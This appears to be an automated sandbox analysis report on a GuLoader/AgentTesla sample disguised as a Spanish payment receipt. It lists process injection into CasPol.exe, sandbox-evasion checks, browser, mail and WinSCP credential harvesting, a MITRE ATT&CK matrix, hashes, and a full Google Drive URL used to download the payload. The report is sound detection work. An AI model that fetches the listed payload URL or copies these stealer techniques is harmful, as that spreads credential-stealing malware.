            Source: rJUSTIFICANTEDEPAGO.exe, 00000002.00000002.2886151117.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.6876893530.00000000070F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: rJUSTIFICANTEDEPAGO.exe, 00000002.00000002.2886151117.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.6876893530.00000000070F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: rJUSTIFICANTEDEPAGO.exe, 00000002.00000002.2886151117.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.6876893530.00000000070F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 00000007.00000002.6876893530.00000000070F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000007.00000002.6872352349.00000000054F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: rJUSTIFICANTEDEPAGO.exe, 00000002.00000002.2802808162.0000000000858000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: rJUSTIFICANTEDEPAGO.exe, 00000002.00000002.2886151117.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.6876893530.00000000070F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: rJUSTIFICANTEDEPAGO.exe, 00000002.00000002.2886151117.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.6876893530.00000000070F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: rJUSTIFICANTEDEPAGO.exe, 00000002.00000002.2886151117.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.6876893530.00000000070F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: rJUSTIFICANTEDEPAGO.exe, 00000002.00000002.2802808162.0000000000858000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: CasPol.exe, 00000007.00000002.6876893530.00000000070F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeCode function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_10001B18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeCode function: 2_2_00401E43 LdrInitializeThunk,ShowWindow,EnableWindow,2_2_00401E43
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F00000Jump to behavior
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeCode function: 2_2_00403350 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_00403350

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000007.00000002.6893759617.00000000360C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4160, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 00000007.00000002.6893759617.00000000360C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4160, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000007.00000002.6893759617.00000000360C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4160, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Ingress Tool Transfer
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            Native API
            1
            Windows Service
            1
            Access Token Manipulation
            1
            Obfuscated Files or Information
            1
            Credentials in Registry
            117
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            Exfiltration Over Bluetooth11
            Encrypted Channel
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)1
            Windows Service
            1
            Timestomp
            Security Account Manager311
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            Automated Exfiltration2
            Non-Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)111
            Process Injection
            1
            DLL Side-Loading
            NTDS21
            Virtualization/Sandbox Evasion
            Distributed Component Object Model1
            Clipboard Data
            Scheduled Transfer13
            Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script21
            Virtualization/Sandbox Evasion
            LSA Secrets1
            Application Window Discovery
            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Access Token Manipulation
            Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items111
            Process Injection
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830400 Sample: rJUSTIFICANTEDEPAGO.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 96 26 googlehosted.l.googleusercontent.com 2->26 28 drive.google.com 2->28 30 doc-0s-98-docs.googleusercontent.com 2->30 36 Multi AV Scanner detection for submitted file 2->36 38 Yara detected GuLoader 2->38 40 Yara detected AgentTesla 2->40 42 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 2->42 8 rJUSTIFICANTEDEPAGO.exe 5 52 2->8         started        signatures3 process4 file5 18 C:\Users\user\AppData\Local\...\System.dll, PE32 8->18 dropped 20 C:\Users\user\AppData\Local\...\AdvSplash.dll, PE32 8->20 dropped 22 C:\...\System.Reflection.TypeExtensions.dll, PE32+ 8->22 dropped 24 C:\Users\...\System.Reflection.Primitives.dll, PE32 8->24 dropped 44 Writes to foreign memory regions 8->44 46 Tries to detect Any.run 8->46 12 CasPol.exe 11 8->12         started        signatures6 process7 dnsIp8 32 googlehosted.l.googleusercontent.com 142.250.186.33, 443, 49817 GOOGLEUS United States 12->32 34 drive.google.com 172.217.16.206, 443, 49816 GOOGLEUS United States 12->34 48 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->48 50 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->50 52 Tries to steal Mail credentials (via file / registry access) 12->52 54 3 other signatures 12->54 16 conhost.exe 12->16         started        signatures9 process10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            rJUSTIFICANTEDEPAGO.exe22%VirustotalBrowse
            rJUSTIFICANTEDEPAGO.exe8%ReversingLabsWin32.Trojan.Generic
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\Nonteachable\Bekmpelsesforanstaltninger\Carcinoid2\Efterplaprer\System.Reflection.Primitives.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\Nonteachable\Bekmpelsesforanstaltninger\Carcinoid2\Efterplaprer\System.Reflection.Primitives.dll0%VirustotalBrowse
            C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\Rntgenstraaler\Overholde\Wingdings\System.Reflection.TypeExtensions.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\Rntgenstraaler\Overholde\Wingdings\System.Reflection.TypeExtensions.dll0%VirustotalBrowse
            C:\Users\user\AppData\Local\Temp\nsz62F8.tmp\AdvSplash.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsz62F8.tmp\AdvSplash.dll3%VirustotalBrowse
            C:\Users\user\AppData\Local\Temp\nsz62F8.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsz62F8.tmp\System.dll1%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            172.217.16.206
            truefalse
              high
              googlehosted.l.googleusercontent.com
              142.250.186.33
              truefalse
                high
                doc-0s-98-docs.googleusercontent.com
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://doc-0s-98-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/npt87m3l1utm86tkghdjh82fk6qcfges/1679307750000/00651307112604445902/*/1Ll5Auv3nDnZ4O0Qt2f2ZcFUknFi4BgKW?e=download&uuid=ea605c4e-1574-48ab-a781-ae85f09da2dafalse
                    high
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://github.com/dotnet/runtimeBSJBrJUSTIFICANTEDEPAGO.exe, 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpfalse
                      high
                      http://nsis.sf.net/NSIS_ErrorErrorrJUSTIFICANTEDEPAGO.exe, 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmp, rJUSTIFICANTEDEPAGO.exe, 00000002.00000000.1680795427.000000000040A000.00000008.00000001.01000000.00000004.sdmpfalse
                        high
                        https://doc-0s-98-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/npt87m3lCasPol.exe, 00000007.00000003.2773592501.0000000005510000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.6872352349.00000000054F5000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.6872352349.000000000554E000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://doc-0s-98-docs.googleusercontent.com/%%doc-0s-98-docs.googleusercontent.comCasPol.exe, 00000007.00000002.6872352349.0000000005508000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://github.com/dotnet/runtimerJUSTIFICANTEDEPAGO.exe, 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              172.217.16.206
                              drive.google.comUnited States
                              15169GOOGLEUSfalse
                              142.250.186.33
                              googlehosted.l.googleusercontent.comUnited States
                              15169GOOGLEUSfalse
                              Joe Sandbox Version:37.0.0 Beryl
                              Analysis ID:830400
                              Start date and time:2023-03-20 11:19:28 +01:00
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 14m 59s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                              Number of analysed new started processes analysed:17
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample file name:rJUSTIFICANTEDEPAGO.exe
                              Detection:MAL
                              Classification:mal96.troj.spyw.evad.winEXE@4/14@2/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 85.9% (good quality ratio 84.4%)
                              • Quality average: 87%
                              • Quality standard deviation: 21.9%
                              HCA Information:
                              • Successful, ratio: 89%
                              • Number of executed functions: 57
                              • Number of non-executed functions: 31
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                              • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, UserOOBEBroker.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, svchost.exe, UsoClient.exe
                              • Excluded domains from analysis (whitelisted): www.bing.com, wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, ctldl.windowsupdate.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • Report size getting too big, too many NtSetInformationFile calls found.
                              No simulations
                              No context
                              No context
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              37f463bf4616ecd445d4a1937da06e19rFACTURA_FAC_2023_1-1000733.PDF.exeGet hashmaliciousGuLoaderBrowse
                              • 172.217.16.206
                              • 142.250.186.33
                              FAKTURA_BG_01.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                              • 172.217.16.206
                              • 142.250.186.33
                              20230320.vbsGet hashmaliciousRemcosBrowse
                              • 172.217.16.206
                              • 142.250.186.33
                              Q9k5bf6Rku.dllGet hashmaliciousUnknownBrowse
                              • 172.217.16.206
                              • 142.250.186.33
                              OYm3R777Yb.exeGet hashmaliciousAmadey, Babuk, Djvu, Fabookie, Raccoon Stealer v2, RedLine, SmokeLoaderBrowse
                              • 172.217.16.206
                              • 142.250.186.33
                              gbK76vpcp8.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                              • 172.217.16.206
                              • 142.250.186.33
                              r7icIGgp7u.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, RedLine, SmokeLoader, VidarBrowse
                              • 172.217.16.206
                              • 142.250.186.33
                              dM4dewAIIl.exeGet hashmaliciousVidarBrowse
                              • 172.217.16.206
                              • 142.250.186.33
                              setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                              • 172.217.16.206
                              • 142.250.186.33
                              setup.exeGet hashmaliciousAmadey, Babuk, Djvu, RedLine, SmokeLoader, VidarBrowse
                              • 172.217.16.206
                              • 142.250.186.33
                              setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                              • 172.217.16.206
                              • 142.250.186.33
                              setup.exeGet hashmaliciousClipboard Hijacker, DjvuBrowse
                              • 172.217.16.206
                              • 142.250.186.33
                              setup.exeGet hashmaliciousAmadey, Babuk, Djvu, Fabookie, RedLine, SmokeLoader, VidarBrowse
                              • 172.217.16.206
                              • 142.250.186.33
                              software.exeGet hashmaliciousBabuk, DjvuBrowse
                              • 172.217.16.206
                              • 142.250.186.33
                              setup.exeGet hashmaliciousClipboard Hijacker, DjvuBrowse
                              • 172.217.16.206
                              • 142.250.186.33
                              setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                              • 172.217.16.206
                              • 142.250.186.33
                              setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                              • 172.217.16.206
                              • 142.250.186.33
                              setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoader, VidarBrowse
                              • 172.217.16.206
                              • 142.250.186.33
                              setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                              • 172.217.16.206
                              • 142.250.186.33
                              setup.exeGet hashmaliciousDjvuBrowse
                              • 172.217.16.206
                              • 142.250.186.33
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\Nonteachable\Bekmpelsesforanstaltninger\Carcinoid2\Efterplaprer\System.Reflection.Primitives.dllrFACTURA_FAC_2023_1-1000733.PDF.exeGet hashmaliciousGuLoaderBrowse
                                rAEAT-AvisodeNotificaci__n.exeGet hashmaliciousGuLoaderBrowse
                                  rFACTURA_FAC_2023_1-1000733.PDF.exeGet hashmaliciousGuLoaderBrowse
                                    AEAT-Notificaci#U00f3n..rarGet hashmaliciousGuLoaderBrowse
                                      Process:C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe
                                      File Type:SVG Scalable Vector Graphics image
                                      Category:dropped
                                      Size (bytes):6689
                                      Entropy (8bit):5.135211840989561
                                      Encrypted:false
                                      SSDEEP:192:VkjcMIy2+X2I2F2C2G2fH7y8cQaVB2nnuy1FQOcQaVv2q22L2k2s:mjcM7u8xaV8nnL1FQOxaVu6
                                      MD5:C96D0DD361AFC6B812BDDD390B765A26
                                      SHA1:71081F096719CAA70B9BAEF86FE642635D8E2765
                                      SHA-256:6690799E5FA3FB0DD6CCE4BAC5AA1607C8A6BB16507854A87520C7DE53052E1B
                                      SHA-512:7C73BC880A9401C64AB0571957B414180C1B94137C7BC870BA602979E7A990640A37991CB87A40BC7E5942A37FDA25EFC58C759C00F4344BA3D88B9AA64182DA
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg. xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:cc="http://creativecommons.org/ns#". xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#". xmlns:svg="http://www.w3.org/2000/svg". xmlns="http://www.w3.org/2000/svg". width="16". version="1.1". style="enable-background:new". id="svg7384". height="16.000036">. <metadata. id="metadata90">. <rdf:RDF>. <cc:Work. rdf:about="">. <dc:format>image/svg+xml</dc:format>. <dc:type. rdf:resource="http://purl.org/dc/dcmitype/StillImage" />. <dc:title>Gnome Symbolic Icons</dc:title>. <cc:license. rdf:resource="http://creativecommons.org/licenses/by-sa/4.0/" />. </cc:Work>. <cc:License. rdf:about="http://creativecommons.org/licenses/by-sa/4.0/">. <cc:permits. rdf:resource="http://creativecommons.org/ns#Reproduction" />. <cc:permits. rdf:resource="htt
                                      Process:C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe
                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):227
                                      Entropy (8bit):6.604776901672149
                                      Encrypted:false
                                      SSDEEP:6:6v/lhPysE9Xj1F/bkqdXujFErL4MImATQZu22F+p:6v/7kR7/bjd8Kgm2Q/2y
                                      MD5:7843C38CC42C6786B3373F166AF10172
                                      SHA1:BA0163109D9B641B1312230B3F62E1E10A61AA5E
                                      SHA-256:E3AF1293F8E8AB5C81300196AF55A7C15D5608291D46A2B86D4255910A7D0E59
                                      SHA-512:B1D3DF6A0A8CACD729CD9A2FD5AB0F74ED611270FA172CDBEB13D46FA71DD5CC5540A2FBFDB6C3004E652D317C8FAD4EC3AE437DF1C082B629870A33CC6BD34F
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...1..P......#.bae....^.^K/fek+........X...........gfw....\.D/..b...a.4..$........H#....o8...}..6.K.....Xc.$ ..'.1.2..vu.../O..>V......CD....<....w........IEND.B`.
                                      Process:C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe
                                      File Type:SVG Scalable Vector Graphics image
                                      Category:dropped
                                      Size (bytes):1329
                                      Entropy (8bit):4.950241534342892
                                      Encrypted:false
                                      SSDEEP:24:t4Cp/YHyKbRAecFxVrGDT/Gfd8hTdyKbRAecFxVrGDT/bNxNxZrGQ:9YHNtAecFmDT/s8hdNtAecFmDT/j3YQ
                                      MD5:021A9F00A28C9D496E490AE951E8EF12
                                      SHA1:F8A6392065D07BAC72E138B0E47A24FFDCCEE74B
                                      SHA-256:B420561770B77FCB47F69B6198B34B11155535F8A2E907BC4A0998CE74AFD340
                                      SHA-512:7F4F2D904EA968BF68E35E0D7F1EAE9718234757D1989879996BFB49D9C447F67544CB0E1C441FD6539D58B5F2C6ACA7E9E0208738C235D9AF0C093511760212
                                      Malicious:false
                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g fill="#474747"><path d="M1.018 7v2H14V7z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal;marker:none" color="#bebebe" font-weight="400" font-family="sans-serif" overflow="visible"/><path d="M11.99 4.99a1 1 0 00-.697 1.717L12.586 8l-1.293 1.293a1 1 0 101.414 1.414L15.414 8l-2.707-2.707a1 1 0 00-.717-.303z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decorati
                                      Process:C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe
                                      File Type:SVG Scalable Vector Graphics image
                                      Category:dropped
                                      Size (bytes):1155
                                      Entropy (8bit):5.154592341044034
                                      Encrypted:false
                                      SSDEEP:24:t4CpQyhEXQDWu4AeWrGMyRQJaPahrGDfJcghSvOqlIQX6e4AeWrGMyp:vhjDWu4Ae3M5wSgDDontqe4Ae3MO
                                      MD5:EFB3C780BC44B346B50B1F0DC6CF6D0F
                                      SHA1:472B0EDD1C4C3092BC7C4DF934ABE126885B1780
                                      SHA-256:990859D3B2C830E23EC276BF1D38A38EE1BA3D89BF04CB138107E4CDE31167B5
                                      SHA-512:5B9C96F146C6A065C89172D02BDE8020876DC9C78859AD2B8B9529C615215F88BA85C2789544F5C5A247C148BB52FE4B5FCA325E7EAC4826D31A0365A0B8BCBE
                                      Malicious:false
                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g fill="#474747"><path d="M5 7c-.31 0-.615.09-.812.281L.594 11l3.656 3.719c.198.19.44.281.75.281h1v-1c0-.257-.13-.529-.312-.719L4.406 12H9s1 0 1-1c0 0 0-1-1-1H4.375l1.219-1.281C5.776 8.529 6 8.257 6 8V7z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" color="#000" font-weight="400" font-family="Sans" overflow="visible" opacity=".35"/><path d="M11 11h1.375l1.125 1.094L14.594 11H16v1.469l-1.094 1.062L16 14.594V16h-1.438L13.5 14.937 12.437 16H11v-1.406l1.063-1.063L11 12.47z" style="marker:none" color="#bebebe" overflow="visible"/><path d="M11 9c.31 0 .615-.09.813-.281L15.406 5 11.75 1.281C11.552 1.091 11.31 1 11 1h-1v1c0 .257.13.529.313.719L11.593 4H7c-.528-.007-1 .472-1 1s.472 1.007 1 1h4.625l-1.219 1.281c-.182.19-.406.462-.406.719v1z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:star
                                      Process:C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe
                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):891
                                      Entropy (8bit):7.745720384539504
                                      Encrypted:false
                                      SSDEEP:24:d4qWCHdkXfUZEcO5MkIi416cOQSkye9V+:d4qnHd8MkIi4Dpb6
                                      MD5:5AF147D26AD399F83825377F04FD56A1
                                      SHA1:B378A498B0DB8114C794E21D533E80CEBE5DDE04
                                      SHA-256:6147A091847FCC9D9EDB22E655C4FC9DE6632C76D4252350400FA286F9791109
                                      SHA-512:EEC16DE49A4698FE4F03F841FBCF045FBBDC9D634EB73ED35DB544B6DB4BC0135CD8E1DF102FD1E8BDE9FC75380948B4C0459685EE2C21858D645B7973759EA6
                                      Malicious:false
